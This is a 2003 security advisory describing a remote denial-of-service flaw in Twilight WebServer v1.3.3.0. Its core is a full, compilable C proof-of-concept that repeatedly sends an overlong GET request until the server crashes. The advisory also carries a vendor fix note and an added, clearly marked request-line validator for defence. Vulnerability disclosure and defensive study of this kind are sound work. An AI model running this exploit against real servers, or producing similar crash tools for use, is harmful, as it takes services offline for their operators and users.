TA-2003-07 Denial of Service Attack against Twilight WebServer v1.3.3.0

Rushjotripbit.org
Date: Sun Jul 13 2003 - 14:38:01 CDT


TA-2003-07 Denial of Service Attack against Twilight WebServer 1.3.3.0
contributed by: rushjo
======================================================================================
Tripbit Security Advisory

TA-2003-07 Denial of Service Attack against Twilight WebServer v1.3.3.0
======================================================================================

PROGRAM: Twilight WebServer v1.3.3.0
HOMEPAGE: http://www.twilightutilities.com
NOT VULNERABLE VERSIONS: v1.3.4.0
RISK: Medium
IMPACT: Denial of Service Attack
RELEASE DATE: 2003-07

======================================================================================
TABLE OF CONTENTS
======================================================================================

1..........................................................DESCRIPTION
2..............................................................DETAILS
3..............................................................EXPLOIT
4............................................................SOLUTIONS
5........................................................VENDOR STATUS
6..............................................................CREDITS
7...........................................................DISCLAIMER
8...........................................................REFERENCES
9.............................................................FEEDBACK

1. DESCRIPTION
======================================================================================

"We are excited to present this completely new Modem Ready Internet Web Server
supporting these terrific features.

* Installs in seconds
* Lets you INSTANTLY share pictures and files
* Modem aware
* Automates telling friends and family when you start serving
* Automatically integrates your web camera
* Allows others to send files to you
* Automatically generates web pages
* Supports file resume
* A truly unique files-sharing tool"

(This description is taken from the website of Twilight Utilities)
 

2. DETAILS
======================================================================================

* Remote DoS:

A security vulnerability in Twilight WebServer allows remote
attackers to crash the server by sending an overly long "GET" request.

3. EXPLOIT
======================================================================================

This is a proof-of-concept exploit for this buffer overflow
vulnerability.

NOTE: This is only for INFORMATION purposes and not for any
      destructive acts!

/****************************************************************************
* Title: Denial of Service Attack against Twilight Webserver v1.3.3.0
* Author: posidron
*
* Date: 2003-07-07
* Reference: http://www.twilightutilities.com
* Version: Twilight Webserver v1.3.3.0
* Related Info: http://www.tripbit.org/advisories/twilight_advisory.txt
*
* Exploit: twilight.c
* Compile: gcc twilight.c -o twilight
*
* Tripbit Security Development
*
* Contact
* [-] Mail: posidrontripbit.org
* [-] Web: http://www.tripbit.org
* [-] IRC: irc.euirc.net 6667 #tripbit
*
* Program received signal SIGSEGV, Segmentation fault.
* 0x41d780 in ?? ()
*****************************************************************************/

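#include <stdio.h>
#include <stdlib.h>      /* exit(), atoi() */
#include <string.h>      /* memset(), strncpy(), strncat(), strlen() */
#include <unistd.h>      /* write(), close() */
#include <netdb.h>
#include <netinet/in.h>
#include <arpa/inet.h>   /* inet_addr() */
#include <sys/types.h>
#include <sys/socket.h>

int main(int argc, char *argv[])
{
        int sockfd;
        struct sockaddr_in srv;
        struct hostent *host;
        /* send: 3 + 1037 + 10 bytes plus NUL; flood: 1037 filler bytes plus NUL */
        char send[1052], flood[1038], get[] = "GET", http[] = "HTTP/1.0\r\n";

        /* Filler of 1037 'A' bytes, NUL-terminated so strncat() stops there */
        memset(flood, 0x41, 1037);
        flood[1037] = '\0';
        
        /* Request line: "GET" + filler + "HTTP/1.0\r\n" */
        strncpy(send, get, sizeof(send) -1);
        strncat(send, flood, sizeof(send) - strlen(send) -1);
        strncat(send, http, sizeof(send) - strlen(send) -1);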
        
        if(argc < 3)
        {
                printf("Usage: %s [target] <port>\n", argv[0]);
                exit(0);
        }

        if((host = gethostbyname(argv[1])) == NULL)
        {
                printf("Unknown host!\n");
                exit(0);
        }
        
        srv.sin_family = AF_INET;
        srv.sin_port = htons(atoi(argv[2]));
        srv.sin_addr.s_addr = inet_addr((char*)argv[1]);

        printf("DoS against Twilight Webserver v1.3.3.0\n");

        for(;;)
        {
                if( (sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
                {
                        printf("Can't start socket()!\n"); exit(0);
                }
        
                if(connect(sockfd,(struct sockaddr*)&srv, sizeof(srv)) < 0)
                {
                        printf("Connection to server broken!\n"); close(sockfd);
                }
        
                if(write(sockfd, send, strlen(send)) < 0)
                {
                        break;
                }
        
                close(sockfd);
        }
        
        printf("Attack done!...\n");
        
        return 0;
}

This error causes a crash of the Twilight WebServer v1.3.3.0.

4. SOLUTIONS
================================================================================

Upgrade your Twilight WebServer to the new fixed version v1.3.4.0. This version
is available at http://www.twilightutilities.com.
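
Added example (not part of the original advisory and not vendor code): the
kind of check whose absence the advisory describes, a request-line validator
that bounds every length before anything is copied. MAX_REQUEST_LINE, the
function names and the sample requests are assumptions made for illustration.

```c
#include <stdio.h>
#include <string.h>

#define MAX_REQUEST_LINE 512  /* assumed limit; the advisory gives no buffer size */
enum { REQ_OK = 200, REQ_BAD = 400, REQ_TOO_LONG = 414 };
/* Validate the first line of a request in buf[0..len); the target is copied
 * into target[] only after every length has been checked. */
int check_request_line(const char *buf, size_t len, char *target, size_t target_sz)
{
    size_t window = len < MAX_REQUEST_LINE ? len : MAX_REQUEST_LINE;
    const char *eol = memchr(buf, '\n', window), *sp1, *sp2;
    size_t line_len, tlen;
    if (eol == NULL)  /* no line terminator inside the allowed window */
        return len >= MAX_REQUEST_LINE ? REQ_TOO_LONG : REQ_BAD;
    line_len = (size_t)(eol - buf);
    if (line_len > 0 && buf[line_len - 1] == '\r')
        line_len--;
    /* Expect "GET SP target SP HTTP/x.y". */
    sp1 = memchr(buf, ' ', line_len);
    if (sp1 == NULL || sp1 - buf != 3 || memcmp(buf, "GET", 3) != 0)
        return REQ_BAD;
    sp2 = memchr(sp1 + 1, ' ', line_len - 4);
    if (sp2 == NULL || (size_t)(buf + line_len - (sp2 + 1)) < 5 ||
        memcmp(sp2 + 1, "HTTP/", 5) != 0)
        return REQ_BAD;
    tlen = (size_t)(sp2 - sp1 - 1);
    if (tlen == 0 || tlen >= target_sz)  /* empty, or would not fit with its NUL */
        return tlen == 0 ? REQ_BAD : REQ_TOO_LONG;
    memcpy(target, sp1 + 1, tlen);
    target[tlen] = '\0';
    return REQ_OK;
}

/* Constructed sample with the 1050-byte shape the advisory's PoC builds. */
int check_poc_shaped_request(void)
{
    char req[1050], target[256];
    memcpy(req, "GET", 3);
    memset(req + 3, 'A', 1037);
    memcpy(req + 1040, "HTTP/1.0\r\n", 10);
    return check_request_line(req, sizeof req, target, sizeof target);
}

int main(void)
{
    char t[64];
    const char ok[] = "GET /index.html HTTP/1.0\r\n";  /* constructed sample */
    printf("normal=%d poc-shaped=%d\n",
           check_request_line(ok, sizeof ok - 1, t, sizeof t), check_poc_shaped_request());
    return 0;
}
```

The same function can sit in a filtering proxy in front of a server that
cannot be upgraded yet, rejecting the request before it reaches the backend.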

5. VENDOR STATUS
================================================================================

The vendor has reportedly been notified. The vendor did not answer the report,
but a new fixed version is now available for download.

6. CREDITS
================================================================================

Discovered by posidron

7. DISCLAIMER
======================================================================

The information within this paper may change without notice. Use of
this information constitutes acceptance for use in an AS IS condition.
There are NO warranties with regard to this information. In no event
shall the author be liable for any damages whatsoever arising out of
or in connection with the use or spread of this information. Any use
of this information is at the user's own risk.

8. REFERENCES
======================================================================

- Original Version:
http://www.tripbit.org

9. FEEDBACK
======================================================================

Please send suggestions, updates, and comments to:

Tripbit Security Advisory
http://www.tripbit.org
rushjotripbit.org
posidrontripbit.org